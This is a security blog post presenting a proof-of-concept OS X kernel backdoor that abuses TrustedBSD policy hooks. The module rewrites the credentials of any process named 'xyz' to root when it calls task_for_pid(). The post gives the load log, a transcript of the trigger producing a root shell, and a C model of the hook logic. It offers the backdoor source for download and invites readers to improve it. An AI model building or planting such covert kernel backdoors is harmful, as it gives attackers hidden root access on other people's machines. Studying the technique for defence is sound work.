Abusing OS X TrustedBSD framework to install r00t backdoors...
source link: https://reverse.put.as/2011/09/18/abusing-os-x-trustedbsd-framework-to-install-r00t-backdoors/
While poking around the OS X implementation of TrustedBSD to write the sandbox guide I had the idea of trying to abuse it for backdooring purposes. It's kind of funny that something designed to protect can be so "easily" abused to install backdoors. This is not rocket science or a big breakthrough post; I was just curious about the possibility of abusing the framework. You still need to find a way to install the kernel module!
So without further delay, I present you Rex, The Wonder Dog. It is a very simple policy module for TrustedBSD that gives r00t privileges to a process named xyz if it calls task_for_pid(). For some unknown reason I couldn't yet do the same with fork() (it was only working for Safari). I was doing this at 3am so I really didn't bother too much about it. It is based on the SEDarwin sample policies code.
I had some trouble compiling the policy module (duplicate symbols) when I tried to use the macro that initializes the module. I strongly suspect this is because I am using Xcode's kernel extension template. This is just a lazy PoC.
The code is unstable. Processes start crashing and the crash reporter isn't executing. It could be due to the very lazy way that r00t privileges are changed for the target process (it only starts to happen after the backdoor is activated). Kernel land is dangerous territory! It is tested only with Snow Leopard 10.6.8. It might work with Lion without any problems. Load it as a normal kernel module with kextload.
dmesg log when module is loaded:
calling mpo_policy_init for rex_the_wonder_dog
calling mpo_policy_initbsd for rex_the_wonder_dog
Security policy loaded: Rex, the wonder dog! (rex_the_wonder_dog)
Starting the backdoor and getting a r00t shell:
$ ./xyz
[info] calling task_for_pid()
[info] task for pid returned 0
[info] uid 501 euid 0
[info] setting uid to 0...
[info] uid 0 euid 0
[info] executing r00t shell...
# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),204(_developer),100(_lpoperator),98(_lpadmin),80(admin),
61(localaccounts),29(certusers),20(staff),12(everyone),9(procmod),8(procview),5(operator),4(tty),3(sys),2(kmem),1(daemon),
401(com.apple.access_screensharing),402(com.apple.sharepoint.group.1)
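To make the trigger path concrete, here is a userland model of what the module does, added here as an example and not the post's kext or xyz.c. The real module registers a struct mac_policy_ops with mac_policy_register() and implements the mpo_proc_check_get_task hook that the kernel runs on every task_for_pid() call; the "model_" types and functions below are simplified stand-ins (the "strict_tfp" policy is an assumed, invented second policy used only to show how the framework composes results), and the in-place credential rewrite mirrors the post's lazy approach rather than the kauth API a real module should use.

```c
/*
 * Userland model of the TrustedBSD MAC check-hook path that Rex abuses.
 * Added example, not the post's kext. Names prefixed model_ and the
 * "strict_tfp" policy are stand-ins/assumptions for illustration.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define MAXCOMLEN 16            /* XNU's p_comm buffer size */
#define MAX_POLICIES 8

struct ucred { unsigned cr_uid, cr_ruid, cr_svuid; };   /* effective, real, saved */
struct proc  { int p_pid; char p_comm[MAXCOMLEN + 1]; struct ucred *p_ucred; };

/* Shape of mpo_proc_check_get_task: subject credential, target process. */
typedef int (*proc_check_get_task_fn)(struct ucred *cred, struct proc *p);
struct mac_policy_ops  { proc_check_get_task_fn mpo_proc_check_get_task; };
struct mac_policy_conf { const char *mpc_name; const struct mac_policy_ops *mpc_ops; };

static const struct mac_policy_conf *policies[MAX_POLICIES];
static int npolicies;
static struct proc *model_current_proc;  /* stand-in for current_proc() */

/* Model of mac_policy_register(): the module just appends itself to the list. */
int model_mac_policy_register(const struct mac_policy_conf *mpc)
{
    if (npolicies == MAX_POLICIES) return ENOMEM;
    policies[npolicies++] = mpc;
    return 0;
}

/*
 * Model of the framework's MAC_CHECK for task_for_pid(): every loaded policy's
 * hook runs and the first non-zero error wins (the kernel composes errors with
 * mac_error_select). A later hook still executes after an earlier one denied.
 */
int model_mac_proc_check_get_task(struct ucred *cred, struct proc *p)
{
    int error = 0;
    for (int i = 0; i < npolicies; i++) {
        proc_check_get_task_fn hook = policies[i]->mpc_ops->mpo_proc_check_get_task;
        if (hook == NULL) continue;
        int e = hook(cred, p);
        if (e != 0 && error == 0) error = e;
    }
    return error;
}

/* Assumed legitimate policy: only root may take another user's task port. */
static int strict_check_get_task(struct ucred *cred, struct proc *p)
{
    return (cred->cr_uid == 0 || cred->cr_uid == p->p_ucred->cr_uid) ? 0 : EPERM;
}
static const struct mac_policy_ops  strict_ops  = { strict_check_get_task };
static const struct mac_policy_conf strict_conf = { "strict_tfp", &strict_ops };

/*
 * The Rex-style hook: if the *caller* is named "xyz", rewrite its effective
 * uid to 0 and allow the call. A check hook has no business mutating the
 * credential it is handed; that side effect is the backdoor.
 */
static int rex_check_get_task(struct ucred *cred, struct proc *p)
{
    (void)p;
    if (strncmp(model_current_proc->p_comm, "xyz", MAXCOMLEN) == 0)
        cred->cr_uid = 0;       /* euid 0; ruid stays 501 until xyz calls setuid(0) */
    return 0;                   /* never deny, stay invisible for everyone else */
}
static const struct mac_policy_ops  rex_ops  = { rex_check_get_task };
static const struct mac_policy_conf rex_conf = { "rex_the_wonder_dog", &rex_ops };

struct demo_result { int tfp_error; unsigned euid, ruid; };

/*
 * Run the trigger as uid 501 under process name `comm`, targeting either our own
 * pid or a root-owned pid 1, then mimic xyz's setuid(0), which the kernel permits
 * once the effective uid is already 0.
 */
struct demo_result demo_trigger(const char *comm, int target_root)
{
    npolicies = 0;
    model_mac_policy_register(&strict_conf);
    model_mac_policy_register(&rex_conf);

    struct ucred cred = { 501, 501, 501 };
    struct ucred rootcred = { 0, 0, 0 };
    struct proc self    = { .p_pid = 1234, .p_ucred = &cred };
    struct proc launchd = { .p_pid = 1, .p_comm = "launchd", .p_ucred = &rootcred };
    strncpy(self.p_comm, comm, MAXCOMLEN);
    self.p_comm[MAXCOMLEN] = '\0';
    model_current_proc = &self;

    struct demo_result r;
    r.tfp_error = model_mac_proc_check_get_task(&cred, target_root ? &launchd : &self);
    if (cred.cr_uid == 0) cred.cr_ruid = cred.cr_svuid = 0;     /* setuid(0) */
    r.euid = cred.cr_uid;
    r.ruid = cred.cr_ruid;
    return r;
}

int main(void)
{
    struct demo_result a = demo_trigger("bash", 1), b = demo_trigger("xyz", 1);
    printf("bash -> pid 1: tfp=%d uid=%u euid=%u\n", a.tfp_error, a.ruid, a.euid);
    printf("xyz  -> pid 1: tfp=%d uid=%u euid=%u\n", b.tfp_error, b.ruid, b.euid);
    return 0;
}
```

Two things worth noticing in the model. First, the check hook never has to deny anything, so an ordinary process sees no behaviour change at all. Second, because the framework runs every policy's hook before combining the results, the credential rewrite happens even when another policy ends up rejecting the task_for_pid() call: the trigger syscall does not need to succeed for the side effect to land. In the real kernel a kauth credential is reference-counted and shared, and a policy should go through the kauth_cred_* functions to produce a new credential rather than poke the fields of the one it was handed; that shortcut is a plausible source of the instability the post describes.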
Policy modules open interesting possibilities for implementing other things. Maybe your own binary integrity check module? Or maybe some nice anti-debug for software that must use kernel modules.
Sorry for the lazy and unstable code. I'm not that much interested in backdoors; I was just interested in testing the possibility. It's (just) a clean way to activate a kernel backdoor. If you improve it and want to share your code, feel free to send it!
Have fun,
fG!
Here are the goodies.
rexthewonderdog_v0.1.zip
SHA256(rexthewonderdog_v0.1.zip)= 4d75ab5859d6a3259de12a9e21a7ee4530b1bc1adb673e2fb24a4f66b9109eac
xyz.c
SHA256(xyz.c)= 3e24337fc7b61f392066e0812051007e8942060a2906d720d345f019de894576